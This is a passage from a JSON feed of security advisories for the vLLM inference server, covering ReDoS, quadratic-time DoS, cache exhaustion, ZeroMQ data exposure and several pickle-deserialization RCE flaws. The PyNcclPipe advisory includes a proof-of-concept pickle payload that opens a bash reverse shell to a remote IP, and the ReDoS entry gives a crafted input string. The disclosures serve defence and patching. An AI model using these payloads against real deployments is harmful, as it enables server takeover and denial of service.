`pythonic_tool_parser.py`","description":"## Summary\n\nA Regular Expression Denial of Service (ReDoS) vulnerability exists in the file [`vllm/entrypoints/openai/tool_parsers/pythonic_tool_parser.py`](https://github.com/vllm-project/vllm/blob/main/vllm/entrypoints/openai/tool_parsers/pythonic_tool_parser.py) of the vLLM project. The root cause is the use of a highly complex and nested regular expression for tool call detection, which can be exploited by an attacker to cause severe performance degradation or make the service unavailable.\n\n## Details\n\nThe following regular expression is used to match tool/function call patterns:\n```\nr\"\\[([a-zA-Z]+\\w*\\(([a-zA-Z]+\\w*=.*,\\s*)*([a-zA-Z]+\\w*=.*\\s)?\\),\\s*)*([a-zA-Z]+\\w*\\(([a-zA-Z]+\\w*=.*,\\s*)*([a-zA-Z]+\\w*=.*\\s*)?\\)\\s*)+\\]\"\n```\nThis pattern contains multiple nested quantifiers (`*`, `+`), optional groups, and inner repetitions which make it vulnerable to catastrophic backtracking.\n\n**Attack Example:**\nA malicious input such as  \n```\n[A(A=\t)A(A=,\t\t)A(A=,\t\t)A(A=,\t\t)... (repeated dozens of times) ...]\n\nor\n\n\"[A(A=\" + \"\\t)A(A=,\\t\" * repeat\n```\n\n\n\ncan cause the regular expression engine to consume CPU exponentially with the input length, effectively freezing or crashing the server (DoS).\n\n**Proof of Concept:**\nA Python script demonstrates that matching such a crafted string with the above regex results in exponential time complexity. Even moderate input lengths can bring the system to a halt.\n\n```\nLength: 22, Time: 0.0000 seconds, Match: False\nLength: 38, Time: 0.0010 seconds, Match: False\nLength: 54, Time: 0.0250 seconds, Match: False\nLength: 70, Time: 0.5185 seconds, Match: False\nLength: 86, Time: 13.2703 seconds, Match: False\nLength: 102, Time: 319.0717 seconds, Match: False\n```\n\n## Impact\n\n- **Denial of Service (DoS):** An attacker can trigger a denial of service by sending specially crafted payloads to any API or interface that invokes this regex, causing excessive CPU usage and making the vLLM service unavailable.\n- **Resource Exhaustion and Memory Retention:** As this regex is invoked during function call parsing, the matching process may hold on to significant CPU and memory resources for extended periods (due to catastrophic backtracking). In the context of vLLM, this also means that the associated KV cache (used for model inference and typically stored in GPU memory) is not released in a timely manner. This can lead to GPU memory exhaustion, degraded throughput, and service instability.\n- **Potential for Broader System Instability:** Resource exhaustion from stuck or slow requests may cascade into broader system instability or service downtime if not mitigated.\n\n## Fix\n\n* https://github.com/vllm-project/vllm/pull/18454\n* Note that while this change has significantly improved performance, this regex may still be problematic. It has gone from exponential time complexity, O(2^N), to O(N^2).","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2025-05-28T17:49:33.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","references":["https://github.com/vllm-project/vllm/security/advisories/GHSA-w6q7-j642-7c25","https://github.com/vllm-project/vllm/pull/18454","https://github.com/vllm-project/vllm/commit/4fc1bf813ad80172c1db31264beaef7d93fe0601","https://nvd.nist.gov/vuln/detail/CVE-2025-48887","https://github.com/pypa/advisory-database/tree/main/vulns/vllm/PYSEC-2025-50.yaml","https://github.com/advisories/GHSA-w6q7-j642-7c25"],"source_kind":"github","identifiers":["GHSA-w6q7-j642-7c25","CVE-2025-48887"],"repository_url":"https://github.com/vllm-project/vllm","blast_radius":0.0,"created_at":"2025-05-28T18:08:00.750Z","updated_at":"2026-10-04T01:06:12.718Z","epss_percentage":0.00518,"epss_percentile":0.42029,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS13NnE3LWo2NDItN2MyNc4ABIbv","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS13NnE3LWo2NDItN2MyNc4ABIbv","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.9.0","vulnerable_version_range":"\u003e= 0.6.4, \u003c 0.9.0"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS13NnE3LWo2NDItN2MyNc4ABIbv/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1oanE0LTg3eGgtZzRmds4ABIIT","url":"https://github.com/advisories/GHSA-hjq4-87xh-g4fv","title":"vLLM Allows Remote Code Execution via PyNcclPipe Communication Service","description":"### Impacted Environments\n\nThis issue ONLY impacts environments using the `PyNcclPipe` KV cache transfer integration with the V0 engine. No other configurations are affected.\n\n### Summary\nvLLM supports the use of the `PyNcclPipe` class to establish a peer-to-peer communication domain for data transmission between distributed nodes. The GPU-side KV-Cache transmission is implemented through the `PyNcclCommunicator` class, while CPU-side control message passing is handled via the `send_obj` and `recv_obj` methods on the CPU side.​ \n\nA remote code execution vulnerability exists in the `PyNcclPipe` service. Attackers can exploit this by sending malicious serialized data to gain server control privileges. \n\nThe intention was that this interface should only be exposed to a private network using the IP address specified by the `--kv-ip` CLI parameter. The vLLM documentation covers how this must be limited to a secured network: https://docs.vllm.ai/en/latest/deployment/security.html\n\nUnfortunately, the default behavior from PyTorch is that the `TCPStore` interface will listen on ALL interfaces, regardless of what IP address is provided. The IP address given was only used as a client-side address to use. vLLM was fixed to use a workaround to force the `TCPStore` instance to bind its socket to a specified private interface.\n\nThis issue was reported privately to PyTorch and they determined that this behavior was intentional.\n\n### Details\nThe `PyNcclPipe`  implementation contains a critical security flaw where it directly processes client-provided data using `pickle.loads`  , creating an unsafe deserialization vulnerability that can lead to ​Remote Code Execution.\n\n1. Deploy a `PyNcclPipe` service configured to listen on port `18888` when launched:\n```python\nfrom vllm.distributed.kv_transfer.kv_pipe.pynccl_pipe import PyNcclPipe\nfrom vllm.config import KVTransferConfig\n\nconfig=KVTransferConfig(\n    kv_ip=\"0.0.0.0\",\n    kv_port=18888,\n    kv_rank=0,\n    kv_parallel_size=1,\n    kv_buffer_size=1024,\n    kv_buffer_device=\"cpu\"\n)\n\np=PyNcclPipe(config=config,local_rank=0)\np.recv_tensor() # Receive data\n```\n\n2. The attacker crafts malicious packets and sends them to the `PyNcclPipe` service:\n\n```python\nfrom vllm.distributed.utils import StatelessProcessGroup\n\nclass Evil:\n    def __reduce__(self):\n        import os\n        cmd='/bin/bash -c \"bash -i \u003e\u0026 /dev/tcp/172.28.176.1/8888 0\u003e\u00261\"'\n        return (os.system,(cmd,))\n\nclient = StatelessProcessGroup.create(\n    host='172.17.0.1',\n    port=18888,\n    rank=1,\n    world_size=2,\n)\n\nclient.send_obj(obj=Evil(),dst=0)\n```\n\nThe call stack triggering ​RCE is as follows:\n\n```\nvllm.distributed.kv_transfer.kv_pipe.pynccl_pipe.PyNcclPipe._recv_impl\n\t-\u003e vllm.distributed.kv_transfer.kv_pipe.pynccl_pipe.PyNcclPipe._recv_metadata\n\t\t-\u003e vllm.distributed.utils.StatelessProcessGroup.recv_obj\n\t\t\t-\u003e pickle.loads \n```\n\nGetshell as follows: \n\n![image](https://github.com/user-attachments/assets/487746ee-3b77-4e4d-99cc-d1ca08431215)\n\n### Reporters\n\nThis issue was reported independently by three different parties:\n\n* @kikayli (Zhuque Lab, Tencent)\n* @omjeki\n* Russell Bryant (@russellb)\n\n### Fix\n\n* https://github.com/vllm-project/vllm/pull/15988 -- vLLM now limits the `TCPStore` socket to the private interface as configured.","origin":"UNSPECIFIED","severity":"CRITICAL","published_at":"2025-05-20T18:04:30.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":9.8,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","references":["https://github.com/vllm-project/vllm/security/advisories/GHSA-hjq4-87xh-g4fv","https://github.com/vllm-project/vllm/pull/15988","https://github.com/vllm-project/vllm/commit/0d6e187e88874c39cda7409cf673f9e6546893e7","https://docs.vllm.ai/en/latest/deployment/security.html","https://nvd.nist.gov/vuln/detail/CVE-2025-47277","https://github.com/advisories/GHSA-hjq4-87xh-g4fv","https://github.com/pypa/advisory-database/tree/main/vulns/vllm/PYSEC-2026-567.yaml","https://github.com/vllm-project/vllm","https://pypi.org/project/vllm"],"source_kind":"github","identifiers":["GHSA-hjq4-87xh-g4fv","CVE-2025-47277"],"repository_url":"https://github.com/vllm-project/vllm","blast_radius":0.0,"created_at":"2025-05-20T19:08:29.180Z","updated_at":"2026-09-23T15:09:08.725Z","epss_percentage":0.00959,"epss_percentile":0.59992,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1oanE0LTg3eGgtZzRmds4ABIIT","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1oanE0LTg3eGgtZzRmds4ABIIT","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.8.5","vulnerable_version_range":"\u003e= 0.6.5, \u003c 0.8.5"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1oanE0LTg3eGgtZzRmds4ABIIT/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS05cGNjLWd2eDUtcjV3bc4ABHiL","url":"https://github.com/advisories/GHSA-9pcc-gvx5-r5wm","title":"Remote Code Execution Vulnerability in vLLM Multi-Node Cluster Configuration","description":"### Affected Environments\n\nNote that this issue only affects the V0 engine, which has been off by default since v0.8.0. Further, the issue only applies to a deployment using tensor parallelism across multiple hosts, which we do not expect to be a common deployment pattern.\n\nSince V0 is has been off by default since v0.8.0 and the fix is fairly invasive, we have decided not to fix this issue. Instead we recommend that users ensure their environment is on a secure network in case this pattern is in use.\n\nThe V1 engine is not affected by this issue.\n\n### Impact\n\nIn a multi-node vLLM deployment using the V0 engine, vLLM uses ZeroMQ for some multi-node communication purposes. The secondary vLLM hosts open a `SUB` ZeroMQ socket and connect to an `XPUB` socket on the primary vLLM host.\n\nhttps://github.com/vllm-project/vllm/blob/c21b99b91241409c2fdf9f3f8c542e8748b317be/vllm/distributed/device_communicators/shm_broadcast.py#L295-L301\n\nWhen data is received on this `SUB` socket, it is deserialized with `pickle`. This is unsafe, as it can be abused to execute code on a remote machine.\n\nhttps://github.com/vllm-project/vllm/blob/c21b99b91241409c2fdf9f3f8c542e8748b317be/vllm/distributed/device_communicators/shm_broadcast.py#L468-L470\n\nSince the vulnerability exists in a client that connects to the primary vLLM host, this vulnerability serves as an escalation point. If the primary vLLM host is compromised, this vulnerability could be used to compromise the rest of the hosts in the vLLM deployment.\n\nAttackers could also use other means to exploit the vulnerability without requiring access to the primary vLLM host. One example would be the use of ARP cache poisoning to redirect traffic to a malicious endpoint used to deliver a payload with arbitrary code to execute on the target machine.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2025-05-06T16:38:35.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.0,"cvss_vector":"CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H","references":["https://github.com/vllm-project/vllm/security/advisories/GHSA-9pcc-gvx5-r5wm","https://github.com/vllm-project/vllm/blob/c21b99b91241409c2fdf9f3f8c542e8748b317be/vllm/distributed/device_communicators/shm_broadcast.py#L295-L301","https://github.com/vllm-project/vllm/blob/c21b99b91241409c2fdf9f3f8c542e8748b317be/vllm/distributed/device_communicators/shm_broadcast.py#L468-L470","https://nvd.nist.gov/vuln/detail/CVE-2025-30165","https://github.com/advisories/GHSA-9pcc-gvx5-r5wm","https://github.com/pypa/advisory-database/tree/main/vulns/vllm/PYSEC-2026-2017.yaml","https://github.com/vllm-project/vllm","https://pypi.org/project/vllm"],"source_kind":"github","identifiers":["GHSA-9pcc-gvx5-r5wm","CVE-2025-30165"],"repository_url":"https://github.com/vllm-project/vllm","blast_radius":0.0,"created_at":"2025-05-06T17:09:05.490Z","updated_at":"2026-10-03T14:05:20.604Z","epss_percentage":0.00495,"epss_percentile":0.40255,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS05cGNjLWd2eDUtcjV3bc4ABHiL","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS05cGNjLWd2eDUtcjV3bc4ABHiL","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.10.0","vulnerable_version_range":"\u003e= 0.5.2, \u003c 0.10.0"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS05cGNjLWd2eDUtcjV3bc4ABHiL/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS12YzZtLWhtNDktZzlxZ84ABHQt","url":"https://github.com/advisories/GHSA-vc6m-hm49-g9qg","title":"vLLM: Quadratic Time Complexity in Input Token Processing​ leads to denial of service","description":"### Summary\nA critical performance vulnerability has been identified in the input preprocessing logic of the multimodal tokenizer. The code dynamically replaces placeholder tokens (e.g., \u003c|audio_*|\u003e, \u003c|image_*|\u003e) with repeated tokens based on precomputed lengths. Due to ​​inefficient list concatenation operations​​, the algorithm exhibits ​​quadratic time complexity (O(n²))​​, allowing malicious actors to trigger resource exhaustion via specially crafted inputs.\n\n### Details\n​​Affected Component​​: input_processor_for_phi4mm function.\nhttps://github.com/vllm-project/vllm/blob/8cac35ba435906fb7eb07e44fe1a8c26e8744f4e/vllm/model_executor/models/phi4mm.py#L1182-L1197\n\nThe code modifies the input_ids list in-place using input_ids = input_ids[:i] + tokens + input_ids[i+1:]. Each concatenation operation copies the entire list, leading to O(n) operations per replacement. For k placeholders expanding to m tokens, total time becomes O(kmn), approximating O(n²) in worst-case scenarios.\n\n### PoC\nTest data demonstrates exponential time growth:\n```python\ntest_cases = [100, 200, 400, 800, 1600, 3200, 6400]\nrun_times = [0.002, 0.007, 0.028, 0.136, 0.616, 2.707, 11.854]  # seconds\n```\nDoubling input size increases runtime by ~4x (consistent with O(n²)).\n\n### Impact\n​​Denial-of-Service (DoS):​​ An attacker could submit inputs with many placeholders (e.g., 10,000 \u003c|audio_1|\u003e tokens), causing CPU/memory exhaustion.\nExample: 10,000 placeholders → ~100 million operations.\n\n\n### Remediation Recommendations​\nPrecompute all placeholder positions and expansion lengths upfront.\nReplace dynamic list concatenation with a single preallocated array.\n```python\n# Pseudocode for O(n) solution\nnew_input_ids = []\nfor token in input_ids:\n    if token is placeholder:\n        new_input_ids.extend([token] * precomputed_length)\n    else:\n        new_input_ids.append(token)\n```","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2025-04-29T16:43:10.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","references":["https://github.com/vllm-project/vllm/security/advisories/GHSA-vc6m-hm49-g9qg","https://github.com/vllm-project/vllm/blob/8cac35ba435906fb7eb07e44fe1a8c26e8744f4e/vllm/model_executor/models/phi4mm.py#L1182-L1197","https://nvd.nist.gov/vuln/detail/CVE-2025-46560","https://github.com/advisories/GHSA-vc6m-hm49-g9qg","https://github.com/pypa/advisory-database/tree/main/vulns/vllm/PYSEC-2026-2022.yaml","https://github.com/vllm-project/vllm","https://pypi.org/project/vllm"],"source_kind":"github","identifiers":["GHSA-vc6m-hm49-g9qg","CVE-2025-46560"],"repository_url":"https://github.com/vllm-project/vllm","blast_radius":0.0,"created_at":"2025-04-29T17:08:50.158Z","updated_at":"2026-09-28T20:07:34.043Z","epss_percentage":0.00524,"epss_percentile":0.42127,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12YzZtLWhtNDktZzlxZ84ABHQt","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS12YzZtLWhtNDktZzlxZ84ABHQt","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.8.5","vulnerable_version_range":"\u003e= 0.8.0, \u003c 0.8.5"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12YzZtLWhtNDktZzlxZ84ABHQt/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1oajR3LWhtMmctcDZ3Nc4ABHQT","url":"https://github.com/advisories/GHSA-hj4w-hm2g-p6w5","title":"vLLM Vulnerable to Remote Code Execution via Mooncake Integration","description":"## Impacted Deployments\n\n**Note that vLLM instances that do NOT make use of the mooncake integration are NOT vulnerable.**\n\n## Description\n\nvLLM integration with mooncake is vaulnerable to remote code execution due to using `pickle` based serialization over unsecured ZeroMQ sockets. The vulnerable sockets were set to listen on all network interfaces, increasing the likelihood that an attacker is able to reach the vulnerable ZeroMQ sockets to carry out an attack.\n\n\nThis is a similar to [GHSA - x3m8 - f7g5 - qhm7](https://github.com/vllm-project/vllm/security/advisories/GHSA-x3m8-f7g5-qhm7), the problem is in\n\nhttps://github.com/vllm-project/vllm/blob/32b14baf8a1f7195ca09484de3008063569b43c5/vllm/distributed/kv_transfer/kv_pipe/mooncake_pipe.py#L179\n\nHere [recv_pyobj()](https://github.com/zeromq/pyzmq/blob/453f00c5645a3bea40d79f53aa8c47d85038dc2d/zmq/sugar/socket.py#L961) Contains implicit `pickle.loads()`, which leads to potential RCE.","origin":"UNSPECIFIED","severity":"CRITICAL","published_at":"2025-04-29T14:52:29.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":10.0,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H","references":["https://github.com/vllm-project/vllm/security/advisories/GHSA-hj4w-hm2g-p6w5","https://github.com/vllm-project/vllm/security/advisories/GHSA-x3m8-f7g5-qhm7","https://github.com/vllm-project/vllm/commit/a5450f11c95847cf51a17207af9a3ca5ab569b2c","https://github.com/vllm-project/vllm/blob/32b14baf8a1f7195ca09484de3008063569b43c5/vllm/distributed/kv_transfer/kv_pipe/mooncake_pipe.py#L179","https://nvd.nist.gov/vuln/detail/CVE-2025-32444","https://github.com/pypa/advisory-database/tree/main/vulns/vllm/PYSEC-2025-42.yaml","https://github.com/advisories/GHSA-hj4w-hm2g-p6w5"],"source_kind":"github","identifiers":["GHSA-hj4w-hm2g-p6w5","CVE-2025-32444"],"repository_url":"https://github.com/vllm-project/vllm","blast_radius":0.0,"created_at":"2025-04-29T15:09:13.806Z","updated_at":"2026-10-03T14:06:33.982Z","epss_percentage":0.01789,"epss_percentile":0.77524,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1oajR3LWhtMmctcDZ3Nc4ABHQT","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1oajR3LWhtMmctcDZ3Nc4ABHQT","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.8.5","vulnerable_version_range":"\u003e= 0.6.5, \u003c 0.8.5"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1oajR3LWhtMmctcDZ3Nc4ABHQT/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS05ZjhmLTJ2bWYtODg1as4ABHQS","url":"https://github.com/advisories/GHSA-9f8f-2vmf-885j","title":"Data exposure via ZeroMQ on multi-node vLLM deployment","description":"### Impact\nIn a multi-node vLLM deployment, vLLM uses ZeroMQ for some multi-node communication purposes. The primary vLLM host opens an `XPUB` ZeroMQ socket and binds it to ALL interfaces. While the socket is always opened for a multi-node deployment, it is only used when doing tensor parallelism across multiple hosts.\n\nAny client with network access to this host can connect to this `XPUB` socket unless its port is blocked by a firewall. Once connected, these arbitrary clients will receive all of the same data broadcasted to all of the secondary vLLM hosts. This data is internal vLLM state information that is not useful to an attacker.\n\nBy potentially connecting to this socket many times and not reading data published to them, an attacker can also cause a denial of service by slowing down or potentially blocking the publisher.\n\n### Detailed Analysis\n\nThe `XPUB` socket in question is created here:\n\nhttps://github.com/vllm-project/vllm/blob/c21b99b91241409c2fdf9f3f8c542e8748b317be/vllm/distributed/device_communicators/shm_broadcast.py#L236-L237\n\nData is published over this socket via `MessageQueue.enqueue()` which is called by `MessageQueue.broadcast_object()`:\n\nhttps://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/device_communicators/shm_broadcast.py#L452-L453\n\nhttps://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/device_communicators/shm_broadcast.py#L475-L478\n\nThe `MessageQueue.broadcast_object()` method is called by the `GroupCoordinator.broadcast_object()` method in `parallel_state.py`:\n\nhttps://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/parallel_state.py#L364-L366\n\nThe broadcast over ZeroMQ is only done if the `GroupCoordinator` was created with `use_message_queue_broadcaster` set to `True`:\n\nhttps://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/parallel_state.py#L216-L219\n\nThe only case where `GroupCoordinator` is created with `use_message_queue_broadcaster` is the coordinator for the tensor parallelism group:\n\nhttps://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/parallel_state.py#L931-L936\n\nTo determine what data is broadcasted to the tensor parallism group, we must continue tracing. `GroupCoordinator.broadcast_object()` is called by `GroupCoordinator.broadcoast_tensor_dict()`:\n\nhttps://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/parallel_state.py#L489\n\nwhich is called by `broadcast_tensor_dict()` in `communication_op.py`:\n\nhttps://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/communication_op.py#L29-L34\n\nIf we look at `_get_driver_input_and_broadcast()` in the V0 `worker_base.py`, we'll see how this tensor dict is formed:\n\nhttps://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/worker/worker_base.py#L332-L352\n\nbut the data actually sent over ZeroMQ is the `metadata_list` portion that is split from this `tensor_dict`. The tensor parts are sent via `torch.distributed` and only metadata about those tensors is sent via ZeroMQ.\n\nhttps://github.com/vllm-project/vllm/blob/54a66e5fee4a1ea62f1e4c79a078b20668e408c6/vllm/distributed/parallel_state.py#L61-L83\n\n### Patches\n\n* https://github.com/vllm-project/vllm/pull/17197\n\n### Workarounds\n\nPrior to the fix, your options include:\n1. Do not expose the vLLM host to a network where any untrusted connections may reach the host.\n2. Ensure that only the other vLLM hosts are able to connect to the TCP port used for the `XPUB` socket. Note that port used is random.\n\n### References\n\n* Relevant code first introduced in https://github.com/vllm-project/vllm/pull/6183","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2025-04-29T14:50:59.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","references":["https://github.com/vllm-project/vllm/security/advisories/GHSA-9f8f-2vmf-885j","https://github.com/vllm-project/vllm/pull/6183","https://github.com/vllm-project/vllm/commit/a0304dc504c85f421d38ef47c64f83046a13641c","https://nvd.nist.gov/vuln/detail/CVE-2025-30202","https://github.com/vllm-project/vllm/pull/17197","https://github.com/advisories/GHSA-9f8f-2vmf-885j","https://github.com/pypa/advisory-database/tree/main/vulns/vllm/PYSEC-2026-2016.yaml","https://github.com/vllm-project/vllm","https://pypi.org/project/vllm"],"source_kind":"github","identifiers":["GHSA-9f8f-2vmf-885j","CVE-2025-30202"],"repository_url":"https://github.com/vllm-project/vllm","blast_radius":0.0,"created_at":"2025-04-29T15:09:13.850Z","updated_at":"2026-09-28T20:07:34.046Z","epss_percentage":0.00598,"epss_percentile":0.46515,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS05ZjhmLTJ2bWYtODg1as4ABHQS","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS05ZjhmLTJ2bWYtODg1as4ABHQS","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.8.5","vulnerable_version_range":"\u003e= 0.5.2, \u003c 0.8.5"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS05ZjhmLTJ2bWYtODg1as4ABHQS/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1nZ3BmLTI0anctM2Zjd84ABHGV","url":"https://github.com/advisories/GHSA-ggpf-24jw-3fcw","title":"CVE-2025-24357 Malicious model remote code execution fix bypass with PyTorch \u003c 2.6.0","description":"## Description\n\nhttps://github.com/vllm-project/vllm/security/advisories/GHSA-rh4j-5rhw-hr54 reported a vulnerability where loading a malicious model could result in code execution on the vllm host. The fix applied to specify `weights_only=True` to calls to `torch.load()` did not solve the problem prior to PyTorch 2.6.0.\n\nPyTorch has issued a new CVE about this problem: https://github.com/advisories/GHSA-53q9-r3pm-6pq6\n\nThis means that versions of vLLM using PyTorch before 2.6.0 are vulnerable to this problem.\n## Background Knowledge\nWhen users install VLLM according to the official manual\n![image](https://github.com/user-attachments/assets/d17e0bdb-26f2-46d6-adf6-0b17e5ddf5c7)\n\nBut the version of PyTorch is specified in the requirements. txt file\n![image](https://github.com/user-attachments/assets/94aad622-ad6d-4741-b772-c342727c58c7)\n\nSo by default when the user install VLLM, it will install the PyTorch with version 2.5.1\n![image](https://github.com/user-attachments/assets/04ff31b0-aad1-490a-963d-00fda91da47b)\n\nIn CVE-2025-24357, weights_only=True was used for patching, but we know this is not secure.\nBecause we found that using Weights_only=True in pyTorch before 2.5.1 was unsafe\n\nHere, we use this interface to prove that it is not safe.\n![image](https://github.com/user-attachments/assets/0d86efcd-2aad-42a2-8ac6-cc96b054c925)\n\n\n## Fix\nupdate PyTorch version to 2.6.0\n\n## Credit\nThis vulnerability was found By Ji'an Zhou and Li'shuo Song","origin":"UNSPECIFIED","severity":"CRITICAL","published_at":"2025-04-23T02:26:06.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":9.8,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","references":["https://github.com/pytorch/pytorch/security/advisories/GHSA-53q9-r3pm-6pq6","https://github.com/vllm-project/vllm/security/advisories/GHSA-ggpf-24jw-3fcw","https://github.com/vllm-project/vllm/security/advisories/GHSA-rh4j-5rhw-hr54","https://github.com/advisories/GHSA-ggpf-24jw-3fcw"],"source_kind":"github","identifiers":["GHSA-ggpf-24jw-3fcw"],"repository_url":"https://github.com/pytorch/pytorch","blast_radius":0.0,"created_at":"2025-04-23T03:08:35.718Z","updated_at":"2026-09-23T15:09:15.919Z","epss_percentage":null,"epss_percentile":null,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1nZ3BmLTI0anctM2Zjd84ABHGV","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1nZ3BmLTI0anctM2Zjd84ABHGV","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.8.0","vulnerable_version_range":"\u003c 0.8.0"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1nZ3BmLTI0anctM2Zjd84ABHGV/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1oZjNjLXd4ZzItNDlxOc4ABGyu","url":"https://github.com/advisories/GHSA-hf3c-wxg2-49q9","title":"vLLM vulnerable to Denial of Service by abusing xgrammar cache","description":"### Impact\n\nThis report is to highlight a vulnerability in XGrammar, a library used by the structured output feature in vLLM. The XGrammar advisory is here: https://github.com/mlc-ai/xgrammar/security/advisories/GHSA-389x-67px-mjg3\n\nThe [xgrammar](https://xgrammar.mlc.ai/docs/) library is the default backend used by vLLM to support structured output (a.k.a. guided decoding). Xgrammar provides a required, built-in cache for its compiled grammars stored in RAM. xgrammar is available by default through the OpenAI compatible API server with both the V0 and V1 engines.\n\nA malicious user can send a stream of very short decoding requests with unique schemas, resulting in an addition to the cache for each request. This can result in a Denial of Service by consuming all of the system's RAM.\n\nNote that even if vLLM was configured to use a different backend by default, it is still possible to choose xgrammar on a per-request basis using the `guided_decoding_backend` key of the `extra_body` field of the request with the V0 engine. This per-request choice is not available when using the V1 engine. \n### Patches\n\n* https://github.com/vllm-project/vllm/pull/16283\n\n### Workarounds\n\nThere is no way to workaround this issue in existing versions of vLLM other than preventing untrusted access to the OpenAI compatible API server.\n\n### References\n\n* https://github.com/mlc-ai/xgrammar/security/advisories/GHSA-389x-67px-mjg3","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2025-04-15T21:21:04.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","references":["https://github.com/mlc-ai/xgrammar/security/advisories/GHSA-389x-67px-mjg3","https://github.com/vllm-project/vllm/security/advisories/GHSA-hf3c-wxg2-49q9","https://github.com/vllm-project/vllm/pull/16283","https://github.com/vllm-project/vllm/commit/cb84e45ac75b42ba6795145923e8eb323bb825ad","https://github.com/advisories/GHSA-hf3c-wxg2-49q9"],"source_kind":"github","identifiers":["GHSA-hf3c-wxg2-49q9"],"repository_url":"https://github.com/mlc-ai/xgrammar","blast_radius":0.0,"created_at":"2025-04-15T22:08:34.409Z","updated_at":"2026-09-23T15:09:19.577Z","epss_percentage":null,"epss_percentile":null,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1oZjNjLXd4ZzItNDlxOc4ABGyu","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1oZjNjLXd4ZzItNDlxOc4ABGyu